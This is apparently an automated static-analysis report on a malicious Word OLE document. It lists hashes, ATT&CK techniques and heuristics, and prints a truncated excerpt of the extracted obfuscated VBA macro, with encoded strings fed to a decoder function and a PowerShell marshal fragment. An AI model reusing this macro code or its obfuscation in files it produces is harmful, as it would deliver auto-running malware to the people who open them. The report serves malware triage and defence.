Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ec3a0b0af738ad38…

MALICIOUS

Office (OLE)

136.5 KB Created: 2018-03-27 05:05:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: d489cf7e7173bceed7e1f82edab44a1f SHA-1: 75c2c0a356df798df730cfbcd95531caf2e07595 SHA-256: ec3a0b0af738ad38a0001d76cb9b4edb204a3aff34a89a0f00872e534e25c158
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing a VBA macro with an AutoOpen function, indicative of an AutoRun macro. The macro utilizes CreateObject and appears to be obfuscated, with calls to a function named 'zzIXdi' that likely decodes a URL or payload. The presence of a password-protected archive lure heuristic suggests the document is designed to trick the user into providing a password to decrypt a malicious payload, which is then likely executed by the macro.

Heuristics 8

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 139,776 bytes but its declared streams total only 34,032 bytes — 105,744 bytes (76%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28817 bytes
SHA-256: cfee77e15d78fcd126e22a874af4bdb8a28e162b039ec24050fd69a5e0accd93
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 26 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "YVdNdKnW"
Function vTpujOlEJrMMD()
On Error Resume Next
Set GoBCP = EEANlu
iVztjJ = 76056 + 99495
wdIvD = 92138 / NbULVk
TSwwnWCp = zzIXdi("nODUAOQBmADYAMgA3ADMAYwAyADQANAAxADkAOQA0ADkAZQBkAGUAZQBiADUAMwBmADYAMQA2AGYAMgA5ADMAMgBmADMAMgAzAGYANAAyAGYAMwBjAGQAYwBkAGMANATvwNi", 3, 125)
Set UtpwI = uUJNrl
pYftiZ = 12103 + 80042
uThIR = 73607 / QiPtDd
Set uDYIb = iaRnX
DQfioo = 56391 + 65618
jzjtmI = 81178 / QsfNlz
YsjiDRRGhjs = zzIXdi("Zjj3ADgANwA4AGEANAA2AGQAZQBhAGUAMwA4AGUAYwAyAGUAMQBmADIAYQAxAGYAZgAxADkAMABjADcAYgA5ADEANAAyADUcLoq%p", 4, 92)
Set sSzMH = qEBcaA
SRMWc = 56464 + 27969
sPpCo = 52940 / vskRR
Set BJEjY = DmDjQ
Sluat = 99132 + 6042
mdqzt = 9517 / isaZU
HEAfBTBRv = zzIXdi("dEw5wHAMwAyADMAMgAxADcAMgBhADEAZgBmADMANgBiAGEAZABjAGUAOABmADIANQA4Aq0i", 7, 62)
Set rBGfPl = nDOzr
NPouiD = 42371 + 25661
XSGpT = 77104 / udGvY
Set iqAiL = HzXkb
dwsic = 16174 + 61097
pbVDuz = 73971 / kTKkn
NKpLaR = zzIXdi("X%whAGYAOABhADcAMgA1ADkAYgA1ADcAZgBiAGYAOAA1ADYAZAAxADkAYwA2AGMAOQAwAGQAYwA2ADUAYgAyADMAZgBjADIAOQBmADgAZQBhADIAZQA0ADgAOAA0ADAANQBmAGYANwBmADgAYQBiADAAot2J", 4, 149)
Set ZGDjOY = LwVAnU
ndGipj = 68687 + 6681
wjLSC = 27911 / ZrNfX
Set MHIzQN = XdBpA
MRWZwZ = 25254 + 96600
zYkQzv = 78681 / VzqJj
OJdzRXHLU = zzIXdi("pMNmGUAYQBkADMANQBjAGUAMQBjADkAMQAwADEAMQAwAGEAYwAzADEANQA3AGUANABhADAAZgA5AGQANQA2AGIAMAAyAGMANQAyAGUAMAA3ADUAZgBmAGMAYQBkADEAYQBhADYAMwA0AOw", 5, 136)
Set JDlKi = XwrnF
PUoRjo = 79583 + 59160
jMzOY = 65779 / jsKoc
Set twJkiY = wAOXYm
VwjZU = 77643 + 55177
cQUYSv = 92773 / IAddmL
CYmidNd = zzIXdi("Xfp2A5AGQAYgBmADIAMgBhADIAZQAyADMAYwAxAGMANwBjADcAMQA1AGEAZgBhADEAMQAwADMAYgBmADUAYgAyAGEANwBlAGMANgA0ADcAMAA1ADcAZQBhADEAOABhADAANwAyADEAZQBjADEANAAyAGYAMABkADMAYQA5AGMAYQBjAGIAMgA2AGIAYQBmAYaz", 5, 187)
Set mqNDf = OWczQ
wiJsTW = 87163 + 39318
QKFjzT = 11026 / uJjJl
Set niiCk = mzXsRZ
UHhBBO = 97622 + 71774
NMhrJU = 14181 / waFuan
lJrVOhN = zzIXdi("jQNgBkAGUANgA2ADIAZQA2ADIAYwA3AGEAYQA3ADMAZQAwADMAYQA4ADcAMQAyADUAMQBkADQAZAA5ADk8KbK", 3, 79)
Set CLNwV = uqzkGa
iSizTK = 34143 + 34894
tnSpp = 89125 / UsuUjz
Set IzDlzS = hGSQDE
SQiZiY = 85436 + 68896
ZLoCti = 56353 / XsmKl
ihkMA = zzIXdi("7ABhADgAYgA5AGYAZQAwAGEAOAA5AGQAOAAxADQAYgA2ADMAYgBmAGUAMwBjADQAMwBlADYANwAxAGUAZgAyADIANgBlADAANwAzADUAMAAwAGQAZAA1ADgAYQA5ADgAMgBkADQAOABmAGMAOQBlADQANwAzADAAZgBlAGIANAA0ADAAMgBiA3 0CSA", 2, 180)
Set fXkmKh = AzGfF
nMLGwY = 21740 + 58849
KQhCdG = 84954 / RUjTC
Set pkaNz = McQNb
OmTjo = 77101 + 45236
qtjhc = 56731 / QhGAUd
UnwwF = zzIXdi("aDEANQA0AGMANQA2ADAAZQAyAGYAZQBjADkAOABhAGUAZABjAGIANAA1ADcANgAxADIAMgBkADQAOQA0ADUAOQAxADYAOQAxADAAMgAwAGMAZgBhAGMANgA2AGYAYQA4ADYAZQAxADgAYQBiADkAYgA2ADcAMABhADYAMQA0AD,lL@P", 2, 169)
Set IFDSbi = nFjkwQ
XPdmr = 51028 + 40430
BtlVhw = 90958 / MHoXd
Set DFGOaz = iOOUwW
YANUUQ = 44734 + 11427
Pbmpp = 37082 / LLEpwK
FLvvIwF = zzIXdi("%M3DgANgA1ADYAZQBkADYAMQAwAGEAYgA5AGEANwA5ADgAZQBiADUAMABiAGYAZAA2AGMAYwBmADcAOmsMv", 4, 76)
Set HMJBA = dOVwcD
VzTJZz = 81314 + 82842
oIvPUD = 17999 / hsNwFH
Set VoXFw = jjocA
vwfIwn = 30453 + 16664
uCiUMj = 76068 / jADfd
criKITKVF = zzIXdi("MnUGQAOQBiADUAYwA4AGEAMQAwAGIAMQA0ADAANQAyADUAYwA1ADUAZQBmAGEANwAxADMAYgBmAGMANAB2UfM", 4, 78)
Set wMEKj = cHBWiA
cLmKw = 6063 + 45851
mtkkZt = 23321 / bwNSh
Set XhVCN = Pmnhj
bTmTf = 76543 + 83434
CLDfu = 63077 / EMiCC
Whitj = zzIXdi("wj5R([RunTImE.IntEROpsERVICES.MaRsHAL]::([rUntiMe.inTEROPsERViCEjiV1J", 5, 60)
Set qCwDA = ijzmA
IlzJic = 3934 + 82780
wLdpIh = 12191 / aIfjF
Set EtUVum = cYpiZ
FzRJh = 81378 + 26194
sqwor = 96028 / mzHnSw
thENAuOMwi = zzIXdi("57RpRkEAZQBjADcAZQA4ADIANQA2ADgANAAyADMAMwBmADIAYgA1ADQAOABhADQAYwAzADkAMABlAGUANAAxAGYAYwBlAGQANQBmADkAZgBmADEAMABlADgAZABiA,ip", 7, 119)
Set dhSzB = BVtMJl
dtwqqw = 58009 + 23614
VjCoQ = 80914 / huGLk
Set TTbkA = aNbuTP
XPlzWb = 79934 + 15766
VOYRG = 98930 / XIEwo
RvWWRjfJAYE = zzIXdi("0oAOAA1AGIAMgBiAGYAMQBjADMAMwAwADMAMgA0ADYAOABkAGIANQAwAGYAMwA2ADkAYwBmADkAMg6QLo", 3, 75)
Set ZwVlm = rwqBN
uowzlS = 98322 + 93583
zNLjh = 51570 / DlOQsP
Set HljYLR = KfFTlB
Q
... (truncated)